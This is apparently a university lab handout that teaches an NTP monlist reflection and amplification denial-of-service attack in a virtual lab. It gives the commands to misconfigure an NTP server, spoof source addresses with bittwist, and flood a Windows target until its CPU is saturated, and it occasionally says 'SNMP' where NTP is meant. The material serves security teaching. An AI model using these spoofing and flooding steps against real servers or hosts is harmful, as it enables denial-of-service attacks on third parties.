Proj 6x: Packet Amplification with NTP (20 pts. extra credit)

What you need

Purpose

NTP is a UDP-based protocol that is frequently set up in an unsafe manner, allowing attackers to use NTP servers to amplify DoS attacks.

This project demonstrates the attack.

Enabling NTP on your Kali Linux NTP Server

On the Kali Linux machine you have chosen to use as the NTP Server, in a Terminal window, execute these commands: 
apt-get update
apt-get install ntp ntpdate -y 
service ntp start
netstat -an | more
You should see a line like this, indicating that port UDP 123 is open, as shown below.
udp       0       0 0.0.0.0:123       0.0.0.0:*

Testing NTP from your Kali Linux Attacker

On your other Kali Linux machine, which you are using as the Attacker, in a Terminal window, execute these commands, replacing the IP address with the IP address of your Kali NTP server: 
apt-get update
apt-get install ntpdate -y 
ntpdate -d 192.168.119.243
You should four "transmit" messages and four "receive" messages, followed by a lot of timestamp values, as shown below.

This shows that your NTP server is operating correctly, allowing another machine to synchronize its clock from it.

Attempting a monlist Query from your Kali Linux Attacker

On your Kali Linux Attacker machine, execute this command, replacing the IP address with the IP address of your Kali NTP server:
ntpdc -n -c monlist 192.168.119.243
You see a "***Request timed out" message, as shown below.

This is because the attacker is not allowed to execute that operation.

Adjusting the NTP Configuration to Trust Everyone

This is one way to make your NTP server vulnerable, allowing everyone to use every operation.

Obviously this is a terrible idea, but there are thousands of NTP servers running now that allow the dangerous operation from everyone.

On your Kali Linux NTP Server, in a Terminal window, and execute these commands:

cp /etc/ntp.conf /etc/ntp.conf.orig

nano /etc/ntp.conf

In nano, scroll down a page or two to find the two "restrict" lines highlighted below, and add # signs to comment them out:

Save the file with Ctrl+X, Y, Enter.

This tells the server to allow anyone to execute any command without authentication, which is obviously a terrible idea.

On your Kali Linux NTP Server, in a Terminal window, execute this command:

service ntp restart

Performing a monlist Query from your Kali Linux Attacker

On your Kali Linux Attacker machine, execute this command, replacing the IP address with the IP address of your Kali NTP server:
ntpdate -d 192.168.119.243

ntpdc -n -c monlist 192.168.119.243

You see a reply, listing the client that has recently used the NTP server (your attack machine) as shown below.

This is the essential vulnerability we will exploit--a small request gives a large response.

Filling the Client List

A real NTP server will have a list of hundreds of clients, because many machines use it. In our test situation, we'll have to send false update requests to simulate that situation.

Capturing an NTP Client Packet

On your Kali Linux Attacker machine, in a Terminal window, execute this command:
wireshark
Start Wireshkark listening on your eth0 interface. In the Filter box, type ntp and press Enter.

On your Kali Linux Attacker machine, open a new Terminal window and execute this command, replacing the IP address with the IP address of your Kali NTP server:

ntpdate -p 1 -d 192.168.119.243
In Wireshark, you should see one "NTP Version 4, client" message and one "NTP Version 4, server" message as shown below.

Saving the NTP Client Packet

On your Kali Linux Attacker machine, click the "NTP Version 4, client" packet so it is highlighted in the top pane of Wireshark, as shown above.

From the Wireshark menu bar, click File, "Export Specified Packets...".

In the "Wireshark: Export Specified Packets" box, at the top, enter a name of "NTP-Client-YOURNAME.pcap".

On the "Save in folder:" line, click Desktop.

In the lower left, click the "Selected packet only button.

Select a "File type" of "Wireshark/tcpdump/... - libpcap", as shown below.

Click Save.

On your Kali Linux Attacker machine, close Wireshark.

Getting Bit-twist

You may have already done this in a previous project. If not, do the steps below.

On your Kali Linux Attacker machine, open a Web browser and go to

http://bittwist.sourceforge.net/

Download the Linux version and save it on your Kali desktop.

On your Kali Linux Attacker machine, in a Terminal window, execute these commands:

Note: when I installed libpcap-dev, I got an error processing "xplico" but it seems to be OK to just ignore that. 

apt-get install libpcap-dev -y
cd 
cd Desktop
tar xzf bittwist-linux-2.0.tar.gz
cd bittwist-linux-2.0
make
make install

Editing the NTP Client Packet

Using bittwiste, we will change the source IP address of the SNMP Request packet to a different IP address.

Bittwiste will calculate the correct checksum automatically.

On your Kali Linux Attacker machine, in a Terminal window, execute this command: 

cd
cd Desktop
bittwiste -I NTP-Client-YOURNAME.pcap -O NTP-Client2-YOURNAME.pcap -T ip -s 1.2.3.4
When the command succeeds, you should see the message "1 packets (87 bytes) written", as shown below.

Sending the Modified Packet

On your Kali Linux machine, in a Terminal window, execute these commands, replacing the IP address with the IP address of your Kali NTP Server: 
bittwist -i eth0 NTP-Client2-YOURNAME.pcap -l 1
ntpdc -n -c monlist 192.168.119.243
You should see a list of addresses, now including the fake address "1.2.3.4", as shown below.

(There are a few other addresses from real NTP servers too.)

Making a Script to send 600 Modified Packets

On your Kali Linux machine, in a Terminal window, execute these commands: 
cd
cd Desktop
nano 600ntp
In nano, enter this script, as shown below: 
for i in {1..60}; do
for j in {1..10}; do
rm NTP-Client2-YOURNAME.pcap
bittwiste -I NTP-Client-YOURNAME.pcap -O NTP-Client2-YOURNAME.pcap -T ip -s 2.2.$i.$j
bittwist -i eth0 NTP-Client2-YOURNAME.pcap -l 1
done
done

Save the file with Ctrl+X, Y, Enter.

Running the Script

On your Kali Linux machine, in a Terminal window, execute this command: 
bash 600ntp
You see a lot of messages, as the pcap file is repeatedly edited and transmitted, as shown below.

Performing a monlist Query from your Kali Linux Attacker

On your Kali Linux Attacker machine, execute this command, replacing the IP address with the IP address of your Kali NTP server:
ntpdc -n -c monlist 192.168.119.243
You may have to repeat the command twice, but when it works, you should see a long list of addresses starting with "2.2", as shown below.

Saving a Screen Image

Make sure your screen shows a lot of addresses starting with "2.2".

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE TO GET FULL CREDIT!

On the host machine, not the virtual machine, open Paint and paste in the image.

Save the image with the filename "Your Name Proj 6xa". Use your real name, not the literal text "Your Name".

Measuring the Packet Amplification Factor

On your Kali Linux Attacker machine, start Wireshark sniffing on your network adapter.

On your Kali Linux Attacker machine, execute this command, replacing the IP address with the IP address of your Kali NTP server:

ntpdc -n -c monlist 192.168.119.243
In Wireshark, stop the capture.

You should see a single packet sent to the server, with a long list of reply packets.

Right-click one of the NTP packets and click "Follow UDP Stream", as shown below.

In the "Follow UDP Stream" box, at the bottom, click the double-arrow to the right of the "Entire conversation" message.

The sizes of the request and response streams are shown. When I did it, the request was 192 bytes and the response was 43,560 bytes, as shown below.

That's an amplification of 43,560 / 192 = 226.9x!

Saving a Screen Image

Make sure your screen shows the sizes of the two UDP streams, as shown above, and that the second stream is much larger than the first one--more than 100 times larger.

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE TO GET FULL CREDIT!

On the host machine, not the virtual machine, open Paint and paste in the image.

Save the image with the filename "Your Name Proj 6xb". Use your real name, not the literal text "Your Name".

Saving the NTP Monlist Request Packet

In the "Follow UDP Stream" box, at the bottom, click Close.

In Wireshark, in the top pane, make sure the first UDP packet is highlighted, the one sent to your NTP server, as shown below.

From the Wireshark menu bar, click File, "Export Specified Packets...".

In the "Wireshark: Export Specified Packets" box, at the top, enter a name of "NTP-Monlist-YOURNAME.pcap".

On the "Save in folder:" line, click Desktop.

In the lower left, click the "Selected packet only button.

Select a "File type" of "Wireshark/tcpdump/... - libpcap", as shown below.

Click Save.

On your Kali Linux Attacker machine, close Wireshark.

Find the Target IP Address

On your Windows 7 target machine, open a Command prompt and execute the IPCONFIG command to find its IP address.

Monitoring the CPU on the Target

On your Windows 7 target machine, right-click the Taskbar (at the bottom of the desktop) and click "Start Task Manager".

Click the Performance tab. You should see 0% CPU usage, or close to it, as shown below:

Leave Task Manager running.

Editing the NTP Monlist Request Packet

Using bittwiste, we will change the source IP address of the SNMP Request packet to the Target Windows 7 machine's IP address.

On your Kali Linux Attacker machine, in a Terminal window, execute this command, replacing the IP address with your Windows 7 target machine's IP address: 

cd
cd Desktop
bittwiste -I NTP-Monlist-YOURNAME.pcap -O NTP-Attack-YOURNAME.pcap -T ip -s 192.168.191.129
When the command succeeds, you should see the message "1 packets (234 bytes) written".

Attacking the Target Windows 7 Machine

On your Kali Linux machine, in a Terminal window, execute this command: 
bittwist -i eth0 NTP-Attack-YOURNAME.pcap -l 0
This sends an endless flood of SNMP requests to the Kali Linux NTP Server, which reflect and amplify, attacking the Windows 7 target.

You should see the CPU increase, as shown below. On my system I was easily able to push the target to 100% CPU, as shown below.

On your Kali Linux machine, press Ctrl+C to stop the attack.

Saving a Screen Image

Make sure your screen shows the CPU graph rising from near-zero to some larger sustained value.

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE TO GET FULL CREDIT!

On the host machine, not the virtual machine, open Paint and paste in the image.

Save the image with the filename "Your Name Proj 6xc". Use your real name, not the literal text "Your Name".

Turning in your Project

Email the images as attachments to an e-mail message.

Send it to: cnit.124@gmail.com with a subject line of "Proj 6x From Your Name", replacing "Your Name" with your own first and last name.

Send a Cc to yourself.

Sources

Analysis of SNMP/NTP/CHARGEN DrDOS Attacks Prolexic, 2013

SNMP Reflected Denial of Service

NTP BASED DDOS ATTACK – UNDERSTANDING NTP REFLECTION (2014)

How-to : Adding SNMP to Windows Server 2008 R2

Duplicate network traffic from guest

Duplicate ping response when running Ubuntu as virtual machine (VMWare)

Windows 7 manual configuration for L2TP/IPSec VPN clients

How to Setup a Windows 2008 R2 SNTP/NTP Server

Windows Time Service Tools and Settings

Using NTP to sync time on Debian

Last Modified: 5-10-14 11:50 am